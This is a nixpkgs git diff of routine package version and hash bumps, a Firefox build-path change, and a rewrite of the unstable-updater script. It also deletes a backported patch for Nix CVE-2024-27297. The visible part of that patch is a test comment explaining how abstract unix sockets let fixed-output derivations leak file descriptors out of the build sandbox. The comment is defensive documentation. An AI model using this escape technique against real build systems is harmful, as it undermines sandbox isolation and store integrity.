diff options
22 files changed, 334 insertions, 566 deletions
diff --git a/pkgs/applications/misc/remnote/default.nix b/pkgs/applications/misc/remnote/default.nix index d9028d8876db1..198922f1876c8 100644 --- a/pkgs/applications/misc/remnote/default.nix +++ b/pkgs/applications/misc/remnote/default.nix @@ -6,11 +6,11 @@ stdenv.mkDerivation (finalAttrs: let in { pname = "remnote"; - version = "1.15.4"; + version = "1.16.4"; src = fetchurl { url = "https://download.remnote.io/remnote-desktop/RemNote-${version}.AppImage"; - hash = "sha256-6WBdTOj/seinx1wJGb/4if3PzCPmtzHyNAFmQwmsrvE="; + hash = "sha256-dgbQ0cbPq7BSQ9VwwH6+GoAxb85HDxRixfjeDJBtOrg="; }; appexec = appimageTools.wrapType2 { diff --git a/pkgs/applications/networking/browsers/firefox/common.nix b/pkgs/applications/networking/browsers/firefox/common.nix index 988cc5481c32b..56dda27e54c92 100644 --- a/pkgs/applications/networking/browsers/firefox/common.nix +++ b/pkgs/applications/networking/browsers/firefox/common.nix @@ -298,9 +298,6 @@ buildStdenv.mkDerivation { setOutputFlags = false; # `./mach configure` doesn't understand `--*dir=` flags. preConfigure = '' - # remove distributed configuration files - rm -f configure js/src/configure .mozconfig* - # Runs autoconf through ./mach configure in configurePhase configureScript="$(realpath ./mach) configure" @@ -308,8 +305,8 @@ buildStdenv.mkDerivation { export MOZ_BUILD_DATE=$(head -n1 sourcestamp.txt) # Set predictable directories for build and state - export MOZ_OBJDIR=$(pwd)/mozobj - export MOZBUILD_STATE_PATH=$(pwd)/mozbuild + export MOZ_OBJDIR=$(pwd)/objdir + export MOZBUILD_STATE_PATH=$TMPDIR/mozbuild # Don't try to send libnotify notifications during build export MOZ_NOSPAM=1 @@ -353,7 +350,7 @@ buildStdenv.mkDerivation { # since the profiling build has not been installed to $out '' OLD_LDFLAGS="$LDFLAGS" - LDFLAGS="-Wl,-rpath,$(pwd)/mozobj/dist/${binaryName}" + LDFLAGS="-Wl,-rpath,$(pwd)/objdir/dist/${binaryName}" ''} fi '' + lib.optionalString googleAPISupport '' @@ -510,7 +507,7 @@ buildStdenv.mkDerivation { ''; preBuild = '' - cd mozobj + cd objdir ''; postBuild = '' @@ -535,9 +532,9 @@ buildStdenv.mkDerivation { preInstall = lib.optionalString crashreporterSupport '' ./mach buildsymbols mkdir -p $symbols/ - cp mozobj/dist/*.crashreporter-symbols.zip $symbols/ + cp objdir/dist/*.crashreporter-symbols.zip $symbols/ '' + '' - cd mozobj + cd objdir ''; postInstall = '' diff --git a/pkgs/applications/science/biology/mafft/default.nix b/pkgs/applications/science/biology/mafft/default.nix index f2e3ead2e913c..ca1f89388a442 100644 --- a/pkgs/applications/science/biology/mafft/default.nix +++ b/pkgs/applications/science/biology/mafft/default.nix @@ -1,14 +1,20 @@ -{ lib, stdenv, fetchFromGitLab }: +{ + lib, + stdenv, + fetchFromGitLab, + runCommand, + mafft, +}: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "mafft"; - version = "7.525"; + version = "7.526"; src = fetchFromGitLab { owner = "sysimm"; - repo = pname; - rev = "v${version}"; - sha256 = "sha256-ckBmvFssYAmYcBHAEftjQqBV0MB0theGfemaPx3XUws="; + repo = "mafft"; + rev = "v${finalAttrs.version}"; + hash = "sha256-VNe00r12qEkLEbpZdJCe5xZ73JA3uAmuAeG+eSeRDI0="; }; preBuild = '' @@ -16,14 +22,34 @@ stdenv.mkDerivation rec { make clean ''; - makeFlags = [ "CC=${stdenv.cc.targetPrefix}cc" "PREFIX=$(out)" ]; + makeFlags = [ + "CC=${stdenv.cc.targetPrefix}cc" + "PREFIX=$(out)" + ]; - meta = with lib; - { - description = "Multiple alignment program for amino acid or nucleotide sequences"; - homepage = "https://mafft.cbrc.jp/alignment/software/"; - license = licenses.bsd3; - maintainers = with maintainers; [ natsukium ]; - platforms = platforms.unix; - }; -} + passthru.tests = { + simple = runCommand "${finalAttrs.pname}-test" { } '' + mkdir $out + cd ${finalAttrs.src}/test + ${lib.getExe mafft} sample > $out/test.fftns2 + ${lib.getExe mafft} --maxiterate 100 sample > $out/test.fftnsi + ${lib.getExe mafft} --globalpair sample > $out/test.gins1 + ${lib.getExe mafft} --globalpair --maxiterate 100 sample > $out/test.ginsi + ${lib.getExe mafft} --localpair sample > $out/test.lins1 + ${lib.getExe mafft} --localpair --maxiterate 100 sample > $out/test.linsi + diff $out/test.fftns2 sample.fftns2 + diff $out/test.fftnsi sample.fftnsi + diff $out/test.gins1 sample.gins1 + diff $out/test.ginsi sample.ginsi + diff $out/test.lins1 sample.lins1 + ''; + }; + + meta = with lib; { + description = "Multiple alignment program for amino acid or nucleotide sequences"; + homepage = "https://mafft.cbrc.jp/alignment/software/"; + license = licenses.bsd3; + maintainers = with maintainers; [ natsukium ]; + platforms = platforms.unix; + }; +}) diff --git a/pkgs/by-name/la/labelle/package.nix b/pkgs/by-name/la/labelle/package.nix index 39d4a1f76a6ba..4affc6ef54e1a 100644 --- a/pkgs/by-name/la/labelle/package.nix +++ b/pkgs/by-name/la/labelle/package.nix @@ -8,14 +8,14 @@ }: python3Packages.buildPythonApplication rec { pname = "labelle"; - version = "1.1.0"; + version = "1.2.0"; pyproject = true; src = fetchFromGitHub { owner = "labelle-org"; repo = "labelle"; rev = "v${version}"; - hash = "sha256-JnV5A3/toTCHCEb0dygouR9MZfk2kdmsKVscwYI2y/Y="; + hash = "sha256-fLlYqJs/V5t8IdfVkfBsjtjM1rRdCyTYF87G+h1VU5Y="; }; postPatch = '' @@ -39,6 +39,8 @@ python3Packages.buildPythonApplication rec { pyqt6 python-barcode pyusb + rich + typer ]; desktopItems = [ diff --git a/pkgs/by-name/tu/tuifimanager/package.nix b/pkgs/by-name/tu/tuifimanager/package.nix index eee63fb90c9d5..3e0531f4805f5 100644 --- a/pkgs/by-name/tu/tuifimanager/package.nix +++ b/pkgs/by-name/tu/tuifimanager/package.nix @@ -5,14 +5,14 @@ python3.pkgs.buildPythonApplication rec { pname = "tuifimanager"; - version = "4.0.0"; + version = "4.0.5"; format = "pyproject"; src = fetchFromGitHub { owner = "GiorgosXou"; repo = "TUIFIManager"; - rev = "v${version}"; - hash = "sha256-bv/+x2xppUK9i3HOm93FIQRu1xlB4wCKZzAapkVlrM0="; + rev = "refs/tags/v${version}"; + hash = "sha256-DuCrIJuADmJ0MHIP0+OJ0zCrQR/oGdgzJ1xck4m/tPo="; }; nativeBuildInputs = [ @@ -34,7 +34,6 @@ python3.pkgs.buildPythonApplication rec { attempt to get more attention to the Uni-Curses project. ''; homepage = "https://github.com/GiorgosXou/TUIFIManager"; - changelog = "https://github.com/GiorgosXou/TUIFIManager/blob/${src.rev}/CHANGELOG.md"; license = licenses.gpl3Only; maintainers = with maintainers; [ michaelBelsanti sigmanificient ]; mainProgram = "tuifi"; diff --git a/pkgs/by-name/wl/wlogout/package.nix b/pkgs/by-name/wl/wlogout/package.nix index 0107dbad89ba8..4f328cb9f53cf 100644 --- a/pkgs/by-name/wl/wlogout/package.nix +++ b/pkgs/by-name/wl/wlogout/package.nix @@ -20,13 +20,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "wlogout"; - version = "1.2.1"; + version = "1.2.2"; src = fetchFromGitHub { owner = "ArtsyMacaw"; repo = "wlogout"; rev = finalAttrs.version; - hash = "sha256-n8r+E6GXXjyDYBTOMiv5musamaUFSpRTM2qHgb047og="; + hash = "sha256-/tYZy56ku68ziSOhy6Dex9RGy+blkU6CN2ze76y7718="; }; outputs = [ "out" "man" ]; diff --git a/pkgs/common-updater/unstable-updater.nix b/pkgs/common-updater/unstable-updater.nix index 29b7fcf196795..d982fc6110ba7 100644 --- a/pkgs/common-updater/unstable-updater.nix +++ b/pkgs/common-updater/unstable-updater.nix @@ -1,5 +1,5 @@ { lib -, writeShellScript +, writeShellApplication , coreutils , git , nix @@ -10,114 +10,162 @@ # commit. { url ? null # The git url, if empty it will be set to src.gitRepoUrl , branch ? null -, stableVersion ? false # Use version format according to RFC 107 (i.e. LAST_TAG+date=YYYY-MM-DD) -, tagPrefix ? "" # strip this prefix from a tag name when using stable version +, hardcodeZeroVersion ? false # Use a made-up version "0" instead of latest tag. Use when there is no previous release, or the project's tagging system is incompatible with what we expect from versions +, tagFormat ? "*" # A `git describe --tags --match '<format>'` pattern that tags must match to be considered +, tagPrefix ? null # strip this prefix from a tag name +, tagConverter ? null # A command to convert more complex tag formats. It receives the git tag via stdin and should convert it into x.y.z format to stdout , shallowClone ? true }: +assert lib.asserts.assertMsg (tagPrefix == null || tagConverter == null) "Can only use either tagPrefix or tagConverter!"; + let - updateScript = writeShellScript "unstable-update-script.sh" '' - set -ex + updateScript = writeShellApplication { + name = "unstable-update-script"; + runtimeInputs = [ + common-updater-scripts + coreutils + git + nix + ]; + text = '' + set -ex + + url="" + branch="" + hardcode_zero_version="" + tag_format="" + tag_prefix="" + tag_converter="" + shallow_clone="" + : "''${systemArg:=}" - url="" - branch="" - use_stable_version="" - tag_prefix="" - shallow_clone="" + while (( $# > 0 )); do + flag="$1" + shift 1 + case "$flag" in + --url=*) + url="''${flag#*=}" + ;; + --branch=*) + branch="''${flag#*=}" + ;; + --hardcode-zero-version) + hardcode_zero_version=1 + ;; + --tag-format=*) + tag_format="''${flag#*=}" + ;; + --tag-prefix=*) + tag_prefix="''${flag#*=}" + ;; + --tag-converter=*) + tag_converter="''${flag#*=}" + ;; + --shallow-clone) + shallow_clone=1 + ;; + *) + echo "$0: unknown option ‘''${flag}’" + exit 1 + ;; + esac + done - while (( $# > 0 )); do - flag="$1" - shift 1 - case "$flag" in - --url=*) - url="''${flag#*=}" - ;; - --branch=*) - branch="''${flag#*=}" - ;; - --use-stable-version) - use_stable_version=1 - ;; - --tag-prefix=*) - tag_prefix="''${flag#*=}" - ;; - --shallow-clone) - shallow_clone=1 - ;; - *) - echo "$0: unknown option ‘''${flag}’" - exit 1 - ;; - esac - done + # By default we set url to src.gitRepoUrl + if [[ -z "$url" ]]; then + # system argument cannot be passed as 1 argument + # shellcheck disable=SC2086 + url="$(nix-instantiate $systemArg --eval -E \ + "with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \ + | tr -d '"')" + fi - # By default we set url to src.gitRepoUrl - if [[ -z "$url" ]]; then - url="$(${nix}/bin/nix-instantiate $systemArg --eval -E \ - "with import ./. {}; $UPDATE_NIX_ATTR_PATH.src.gitRepoUrl" \ - | tr -d '"')" - fi + # Get info about HEAD from a shallow git clone + tmpdir="$(mktemp -d)" - # Get info about HEAD from a shallow git clone - tmpdir="$(${coreutils}/bin/mktemp -d)" + cloneArgs=() - cloneArgs=( - --bare - ) + if [[ "$shallow_clone" == "1" ]]; then + cloneArgs+=(--depth=1) + fi - if [[ "$shallow_clone" == "1" ]]; then - cloneArgs+=(--depth=1) - fi + if [[ -n "$branch" ]]; then + cloneArgs+=(--branch="$branch") + fi - if [[ -n "$branch" ]]; then - cloneArgs+=(--branch="$branch") - fi + git clone "''${cloneArgs[@]}" "$url" "$tmpdir" + getLatestVersion() { + git describe --tags --abbrev=0 --match "''${tag_format}" 2> /dev/null || true + } - ${git}/bin/git clone "''${cloneArgs[@]}" "$url" "$tmpdir" + pushd "$tmpdir" + commit_date="$(git show -s --pretty='format:%cs')" + commit_sha="$(git show -s --pretty='format:%H')" + last_tag="" + if [[ -z "$hardcode_zero_version" ]]; then + if [[ "$shallow_clone" == "1" ]]; then + depth=100 + while (( depth < 10000 )); do + last_tag="$(getLatestVersion)" + if [[ -n "$last_tag" ]]; then + break + fi + git fetch --depth="$depth" --tags + depth=$(( depth * 2 )) + done - pushd "$tmpdir" - commit_date="$(${git}/bin/git show -s --pretty='format:%cs')" - commit_sha="$(${git}/bin/git show -s --pretty='format:%H')" - if [[ -z "$use_stable_version" ]]; then - new_version="unstable-$commit_date" - else - depth=100 - while (( $depth < 10000 )); do - last_tag="$(${git}/bin/git describe --tags --abbrev=0 2> /dev/null || true)" - if [[ -n "$last_tag" ]]; then - break - fi - ${git}/bin/git fetch --depth="$depth" --tags - depth=$(( $depth * 2 )) - done - if [[ -z "$last_tag" ]]; then - echo "Cound not found a tag within last 10000 commits" > /dev/stderr - exit 1 - fi - if [[ -n "$tag_prefix" ]]; then - last_tag="''${last_tag#$tag_prefix}" - fi - new_version="$last_tag+date=$commit_date" - fi - popd - # ${coreutils}/bin/rm -rf "$tmpdir" + if [[ -z "$last_tag" ]]; then + # To be extra sure, check if full history helps with finding a tag + git fetch --tags + last_tag="$(getLatestVersion)" + fi + else + last_tag="$(getLatestVersion)" + fi + if [[ -z "$last_tag" ]]; then + last_tag="0" + fi + if [[ -n "$tag_prefix" ]]; then + echo "Stripping prefix '$tag_prefix' from tag '$last_tag'" + last_tag="''${last_tag#"''${tag_prefix}"}" + fi + if [[ -n "$tag_converter" ]]; then + echo "Running '$last_tag' through: $tag_converter" + last_tag="$(echo "''${last_tag}" | ''${tag_converter})" + fi + else + last_tag="0" + fi + if [[ ! "$last_tag" =~ ^[[:digit:]] ]]; then + echo "Last tag '$last_tag' does not start with a digit" > /dev/stderr + exit 1 + fi + new_version="$last_tag-unstable-$commit_date" + popd + # rm -rf "$tmpdir" - # update the nix expression - ${common-updater-scripts}/bin/update-source-version \ - "$UPDATE_NIX_ATTR_PATH" \ - "$new_version" \ - --rev="$commit_sha" - ''; + # update the nix expression + update-source-version \ + "$UPDATE_NIX_ATTR_PATH" \ + "$new_version" \ + --rev="$commit_sha" + ''; + }; in [ - updateScript + (lib.getExe updateScript) "--url=${builtins.toString url}" + "--tag-format=${tagFormat}" ] ++ lib.optionals (branch != null) [ "--branch=${branch}" -] ++ lib.optionals stableVersion [ - "--use-stable-version" +] ++ lib.optionals (tagPrefix != null) [ "--tag-prefix=${tagPrefix}" +] ++ lib.optionals (tagConverter != null) [ + "--tag-converter=${tagConverter}" +] ++ lib.optionals hardcodeZeroVersion [ + "--hardcode-zero-version" ] ++ lib.optionals shallowClone [ "--shallow-clone" ] diff --git a/pkgs/development/libraries/babl/default.nix b/pkgs/development/libraries/babl/default.nix index b3ec8194c92a9..e74947dd8194a 100644 --- a/pkgs/development/libraries/babl/default.nix +++ b/pkgs/development/libraries/babl/default.nix @@ -1,30 +1,36 @@ { stdenv , lib -, fetchpatch , fetchurl , meson , ninja , pkg-config +, gi-docgen , gobject-introspection , lcms2 , vala }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "babl"; - version = "0.1.106"; + version = "0.1.108"; - outputs = [ "out" "dev" ]; + outputs = [ "out" "dev" "devdoc" ]; src = fetchurl { - url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor version}/babl-${version}.tar.xz"; - hash = "sha256-0yUTXTME8IjBNMxiABOs8DXeLl0SWlCi2RBU5zd8QV8="; + url = "https://download.gimp.org/pub/babl/${lib.versions.majorMinor finalAttrs.version}/babl-${finalAttrs.version}.tar.xz"; + hash = "sha256-Jt7+neqresTQ4HbKtJwqDW69DfDDH9IJklpfB+3uFHU="; }; + patches = [ + # Allow overriding path to dev output that will be hardcoded e.g. in pkg-config file. + ./dev-prefix.patch + ]; + nativeBuildInputs = [ meson ninja pkg-config + gi-docgen gobject-introspection vala ]; @@ -33,6 +39,15 @@ stdenv.mkDerivation rec { lcms2 ]; + mesonFlags = [ + "-Dprefix-dev=${placeholder "dev"}" + ]; + + postFixup = '' + # Cannot be in postInstall, otherwise _multioutDocs hook in preFixup will move right back. + moveToOutput "share/doc" "$devdoc" + ''; + meta = with lib; { description = "Image pixel format conversion library"; mainProgram = "babl"; @@ -42,4 +57,4 @@ stdenv.mkDerivation rec { maintainers = with maintainers; [ jtojnar ]; platforms = platforms.unix; }; -} +}) diff --git a/pkgs/development/libraries/babl/dev-prefix.patch b/pkgs/development/libraries/babl/dev-prefix.patch new file mode 100644 index 0000000000000..9dab6c6a9ad47 --- /dev/null +++ b/pkgs/development/libraries/babl/dev-prefix.patch @@ -0,0 +1,29 @@ +diff --git a/meson.build b/meson.build +index 2350a1f..56f015d 100644 +--- a/meson.build ++++ b/meson.build +@@ -551,7 +551,7 @@ pkgconfig.generate( + variables: [ + 'datadir=${prefix}/share', + 'pluginsdir=${libdir}/@0@'.format(lib_name), +- 'girdir=${datadir}/gir-1.0', ++ 'girdir=@0@/share/gir-1.0'.format(get_option('prefix-dev')), + 'typelibdir=${libdir}/girepository-1.0', + ], + uninstalled_variables: [ +diff --git a/meson_options.txt b/meson_options.txt +index f9d558c..3cac593 100644 +--- a/meson_options.txt ++++ b/meson_options.txt +@@ -9,6 +9,11 @@ option('enable-gir', + choices: ['auto', 'true', 'false'], + description: 'gobject introspection .gir generation' + ) ++option('prefix-dev', ++ type: 'string', ++ value: '', ++ description: 'Like prefix but for dev output of the package' ++) + option('enable-vapi', + type: 'boolean', + value: 'true', diff --git a/pkgs/development/libraries/wlroots/default.nix b/pkgs/development/libraries/wlroots/default.nix index 4dd884b45859a..e130da1664be7 100644 --- a/pkgs/development/libraries/wlroots/default.nix +++ b/pkgs/development/libraries/wlroots/default.nix @@ -125,8 +125,8 @@ rec { }; wlroots_0_17 = generic { - version = "0.17.2"; - hash = "sha256-Of9qykyVnBURc5A2pvCMm7sLbnuuG7OPWLxodQLN2Xg="; + version = "0.17.3"; + hash = "sha256-jth6BKci3sVDC86o+gSHKyDWnibVcNmipm7nn0S6LTg="; extraBuildInputs = [ ffmpeg hwdata diff --git a/pkgs/development/python-modules/anywidget/default.nix b/pkgs/development/python-modules/anywidget/default.nix index 07c6bb744923c..767fc775851d1 100644 --- a/pkgs/development/python-modules/anywidget/default.nix +++ b/pkgs/development/python-modules/anywidget/default.nix @@ -14,14 +14,14 @@ buildPythonPackage rec { pname = "anywidget"; - version = "0.9.9"; + version = "0.9.10"; pyproject = true; disabled = pythonOlder "3.7"; src = fetchPypi { inherit pname version; - hash = "sha256-vs5tYcVabzlkCeu1p20mDo9LIh+cUeUWFQc3o18WUu8="; + hash = "sha256-OQpigkCYHAmBPHUjJ53cq4L/T9Moet1UM7eLE2kIkGg="; }; # We do not need the jupyterlab build dependency, because we do not need to diff --git a/pkgs/development/python-modules/ipycanvas/default.nix b/pkgs/development/python-modules/ipycanvas/default.nix index 85961b450ec17..2222c0bdad0d3 100644 --- a/pkgs/development/python-modules/ipycanvas/default.nix +++ b/pkgs/development/python-modules/ipycanvas/default.nix @@ -2,7 +2,7 @@ , buildPythonPackage , fetchPypi , pythonOlder -, jupyter-packaging +, hatchling , ipywidgets , numpy , pillow @@ -10,14 +10,14 @@ buildPythonPackage rec { pname = "ipycanvas"; - version = "0.13.1"; - format = "pyproject"; + version = "0.13.2"; + pyproject = true; disabled = pythonOlder "3.7"; src = fetchPypi { inherit pname version; - hash = "sha256-+cOUBoG8ODgzkPjEbqXYRF1uEcbaZITDfYnfWuHawTE="; + hash = "sha256-Ujh9nYf2WVXzlVL7eSfEReXl5JN9hTgU2RDL6O+g+3k="; }; # We relax dependencies here instead of pulling in a patch because upstream @@ -26,13 +26,16 @@ buildPythonPackage rec { # postPatch = '' substituteInPlace pyproject.toml \ - --replace '"jupyterlab==3.*",' "" \ - --replace 'jupyter_packaging~=' 'jupyter_packaging>=' + --replace-fail '"jupyterlab>=3,<5",' "" \ ''; - nativeBuildInputs = [ jupyter-packaging ]; + build-system = [ + hatchling + ]; - propagatedBuildInputs = [ ipywidgets numpy pillow ]; + env.HATCH_BUILD_NO_HOOKS = true; + + dependencies = [ ipywidgets numpy pillow ]; doCheck = false; # tests are in Typescript and require `npx` and `chromium` pythonImportsCheck = [ "ipycanvas" ]; diff --git a/pkgs/development/python-modules/ipyniivue/default.nix b/pkgs/development/python-modules/ipyniivue/default.nix index c097f2cb404e8..14667b0942ed4 100644 --- a/pkgs/development/python-modules/ipyniivue/default.nix +++ b/pkgs/development/python-modules/ipyniivue/default.nix @@ -3,21 +3,21 @@ , fetchPypi , pythonOlder , hatchling -, hatch-jupyter-builder +, hatch-vcs , anywidget , pytestCheckHook }: buildPythonPackage rec { pname = "ipyniivue"; - version = "2.0.0"; + version = "2.0.1"; pyproject = true; disabled = pythonOlder "3.7"; src = fetchPypi { inherit pname version; - hash = "sha256-CvMSUvPyXxPexs0/0sa/xt65RFWtvmYZwGSMIQGvLkc="; + hash = "sha256-C0mYkguN4ZfxSLqETH3dUwXeoNcicrmAgp6e9IIT43s="; }; # We do not need the build hooks, because we do not need to @@ -26,7 +26,7 @@ buildPythonPackage rec { build-system = [ hatchling - hatch-jupyter-builder + hatch-vcs ]; dependencies = [ anywidget ]; diff --git a/pkgs/development/python-modules/jupyterlab-server/default.nix b/pkgs/development/python-modules/jupyterlab-server/default.nix index f295ce204ad29..059cb1c5ac52a 100644 --- a/pkgs/development/python-modules/jupyterlab-server/default.nix +++ b/pkgs/development/python-modules/jupyterlab-server/default.nix @@ -21,7 +21,7 @@ buildPythonPackage rec { pname = "jupyterlab-server"; - version = "2.26.0"; + version = "2.27.1"; pyproject = true; disabled = pythonOlder "3.8"; @@ -29,7 +29,7 @@ buildPythonPackage rec { src = fetchPypi { pname = "jupyterlab_server"; inherit version; - hash = "sha256-mzupHPKDf38ST8o21j88qArOK+1ImKY91H5lmMGrAG8="; + hash = "sha256-CXtaxwm2dscoSsnF43PxGTClYfUs1ahuT8flqcioYx0="; }; postPatch = '' diff --git a/pkgs/development/python-modules/jupyterlab/default.nix b/pkgs/development/python-modules/jupyterlab/default.nix index dc48c597d5489..7b9a17d91e2ca 100644 --- a/pkgs/development/python-modules/jupyterlab/default.nix +++ b/pkgs/development/python-modules/jupyterlab/default.nix @@ -20,14 +20,14 @@ buildPythonPackage rec { pname = "jupyterlab"; - version = "4.1.6"; + version = "4.1.8"; pyproject = true; disabled = pythonOlder "3.8"; src = fetchPypi { inherit pname version; - hash = "sha256-eTXza6JuthUYOk9cK7yleRtRCM4qALVQX4z9EA1TZI4="; + hash = "sha256-M4St7YaA585QT9Y7i7iaOd8hycdpTZ59xKaHQs2zD5s="; }; nativeBuildInputs = [ diff --git a/pkgs/development/python-modules/nbdev/default.nix b/pkgs/development/python-modules/nbdev/default.nix index 8a298ec19f67f..ee82753ae822e 100644 --- a/pkgs/development/python-modules/nbdev/default.nix +++ b/pkgs/development/python-modules/nbdev/default.nix @@ -1,40 +1,50 @@ { lib , buildPythonPackage , fetchPypi -, fastprogress +, pythonRelaxDepsHook +, setuptools +, ipywidgets , fastcore -, asttokens , astunparse , watchdog , execnb , ghapi , pyyaml -, quarto , pythonOlder }: buildPythonPackage rec { pname = "nbdev"; - version = "2.3.13"; - format = "setuptools"; + version = "2.3.14"; + pyproject = true; disabled = pythonOlder "3.7"; src = fetchPypi { inherit pname version; - hash = "sha256-Umkf3CcRRSS+pK3UKeTg+Ru3TW+qHNoQ2F6nUk8jQUU="; + hash = "sha256-9Tacr4mWmjXspKKCkFDWYeT7KkBh4/3f6UOkfj0/leg="; }; - propagatedBuildInputs = [ - fastprogress - fastcore - asttokens + nativeBuildInputs = [ + pythonRelaxDepsHook + ]; + + pythonRelaxDeps = [ + "ipywidgets" + ]; + + build-system = [ + setuptools + ]; + + dependencies = [ astunparse - watchdog execnb + fastcore ghapi + ipywidgets pyyaml - quarto + watchdog ]; # no real tests diff --git a/pkgs/development/python-modules/nvidia-ml-py/default.nix b/pkgs/development/python-modules/nvidia-ml-py/default.nix index b5c8f5a53d689..b88947b15c70c 100644 --- a/pkgs/development/python-modules/nvidia-ml-py/default.nix +++ b/pkgs/development/python-modules/nvidia-ml-py/default.nix @@ -7,13 +7,13 @@ buildPythonPackage rec { pname = "nvidia-ml-py"; - version = "12.535.133"; + version = "12.550.52"; format = "setuptools"; src = fetchPypi { inherit pname version; extension = "tar.gz"; - hash = "sha256-sVWa8NV90glVv1jQWv/3sWbd1ElH6zBRyZBWOHmesdw="; + hash = "sha256-3+3XFDNccuZaMshun12xzUlSbUTW2McoCdmWlY9zTAc="; }; patches = [ diff --git a/pkgs/development/python-modules/papermill/default.nix b/pkgs/development/python-modules/papermill/default.nix index b419398eef996..743812b84b62a 100644 --- a/pkgs/development/python-modules/papermill/default.nix +++ b/pkgs/development/python-modules/papermill/default.nix @@ -1,5 +1,7 @@ { lib , stdenv +, aiohttp +, ansicolors , azure-datalake-store , azure-identity , azure-storage-blob @@ -17,8 +19,8 @@ , pygithub , pytest-mock , pytestCheckHook +, pythonAtLeast , pythonOlder -, pythonRelaxDepsHook , pyyaml , requests , setuptools @@ -28,7 +30,7 @@ buildPythonPackage rec { pname = "papermill"; - version = "2.5.0"; + version = "2.6.0"; pyproject = true; disabled = pythonOlder "3.8"; @@ -37,19 +39,14 @@ buildPythonPackage rec { owner = "nteract"; repo = "papermill"; rev = "refs/tags/${version}"; - hash = "sha256-x6f5hhTdOPDVFiBvRhfrXq1wd5keYiuUshXnT0IkjX0="; + hash = "sha256-NxC5+hRDdMCl/7ZIho5ml4hdENrgO+wzi87GRPeMv8Q="; }; - pythonRelaxDeps = [ - "aiohttp" - ]; - - nativeBuildInputs = [ - pythonRelaxDepsHook + build-system = [ setuptools ]; - propagatedBuildInputs = [ + dependencies = [ click pyyaml nbformat @@ -58,6 +55,9 @@ buildPythonPackage rec { requests entrypoints tenacity + ansicolors + ] ++ lib.optionals (pythonAtLeast "3.12") [ + aiohttp ]; passthru.optional-dependencies = { diff --git a/pkgs/development/python-modules/plotnine/default.nix b/pkgs/development/python-modules/plotnine/default.nix index a25dcd9125f02..fb86d44472d26 100644 --- a/pkgs/development/python-modules/plotnine/default.nix +++ b/pkgs/development/python-modules/plotnine/default.nix @@ -17,7 +17,7 @@ buildPythonPackage rec { pname = "plotnine"; - version = "0.13.4"; + version = "0.13.5"; pyproject = true; disabled = pythonOlder "3.9"; @@ -26,7 +26,7 @@ buildPythonPackage rec { owner = "has2k1"; repo = "plotnine"; rev = "refs/tags/v${version}"; - hash = "sha256-ylsaV5yWVbxvD74spAI5tDwIjjue7MOMaGgp4Dc8Nhk="; + hash = "sha256-vGxsBcY4CRT4rBUq0AQ4oo0etKK+CtUD487VvnoK/rI="; }; postPatch = '' diff --git a/pkgs/tools/package-management/nix/default.nix b/pkgs/tools/package-management/nix/default.nix index 4df7399683edf..8833821a9e4d6 100644 --- a/pkgs/tools/package-management/nix/default.nix +++ b/pkgs/tools/package-management/nix/default.nix @@ -133,11 +133,10 @@ let in lib.makeExtensible (self: ({ nix_2_3 = ((common { - version = "2.3.17"; - hash = "sha256-EK0pgHDekJFqr0oMj+8ANIjq96WPjICe2s0m4xkUdH4="; + version = "2.3.18"; + hash = "sha256-jBz2Ub65eFYG+aWgSI3AJYvLSghio77fWQiIW1svA9U="; patches = [ patch-monitorfdhup - ./patches/2_3/CVE-2024-27297.patch ]; maintainers = with lib.maintainers; [ flokli raitobezarius ]; }).override { boehmgc = boehmgc-nix_2_3; }).overrideAttrs { @@ -157,8 +156,8 @@ in lib.makeExtensible (self: ({ }; nix_2_20 = common { - version = "2.20.5"; - hash = "sha256-bfFe38BkoQws7om4gBtBWoNTLkt9piMXdLLoHYl+vBQ="; + version = "2.20.6"; + hash = "sha256-BSl8Jijq1A4n1ToQy0t0jDJCXhJK+w1prL8QMHS5t54="; }; nix_2_21 = common { diff --git a/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch b/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch deleted file mode 100644 index b8201cb99ef5c..0000000000000 --- a/pkgs/tools/package-management/nix/patches/2_3/CVE-2024-27297.patch +++ /dev/null @@ -1,375 +0,0 @@ -From 9c0be4c156e74a3e7e0d33b04d870642350e72d4 Mon Sep 17 00:00:00 2001 -From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= - <theophane.hufschmitt@tweag.io> -Date: Mon, 12 Feb 2024 21:28:20 +0100 -Subject: [PATCH 1/4] Add a NixOS test for the sandbox escape - -Test that we can't leverage abstract unix domain sockets to leak file -descriptors out of the sandbox and modify the path after it has been -registered. ---- - release.nix | 5 ++ - tests/nixos/ca-fd-leak/default.nix | 93 ++++++++++++++++++++++++++++++ - tests/nixos/ca-fd-leak/sender.c | 65 +++++++++++++++++++++ - tests/nixos/ca-fd-leak/smuggler.c | 66 +++++++++++++++++++++ - 4 files changed, 229 insertions(+) - create mode 100644 tests/nixos/ca-fd-leak/default.nix - create mode 100644 tests/nixos/ca-fd-leak/sender.c - create mode 100644 tests/nixos/ca-fd-leak/smuggler.c - -diff --git a/release.nix b/release.nix -index f468946c5..2e71f3796 100644 ---- a/release.nix -+++ b/release.nix -@@ -235,6 +235,11 @@ let - nix = build.x86_64-linux; system = "x86_64-linux"; - }); - -+ tests.ca-fd-leak = (import ./tests/nixos/ca-fd-leak rec { -+ inherit nixpkgs; -+ nix = build.x86_64-linux; system = "x86_64-linux"; -+ }); -+ - tests.setuid = pkgs.lib.genAttrs - ["i686-linux" "x86_64-linux"] - (system: -diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix -new file mode 100644 -index 000000000..c252caa4d ---- /dev/null -+++ b/tests/nixos/ca-fd-leak/default.nix -@@ -0,0 +1,93 @@ -+# Nix is a sandboxed build system. But Not everything can be handled inside its -+# sandbox: Network access is normally blocked off, but to download sources, a -+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". -+# The detail here is not important, but in our case it means that the hash of -+# the output has to be known beforehand. And if you know that, you get a few -+# rights: you no longer run inside a special network namespace! -+# -+# Now, Linux has a special feature, that not many other unices do: Abstract -+# unix domain sockets! Not only that, but those are namespaced using the -+# network namespace! That means that we have a way to create sockets that are -+# available in every single fixed-output derivation, and also all processes -+# running on the host machine! Now, this wouldn't be that much of an issue, as, -+# well, the whole idea is that the output is pure, and all processes in the -+# sandbox are killed before finalizing the 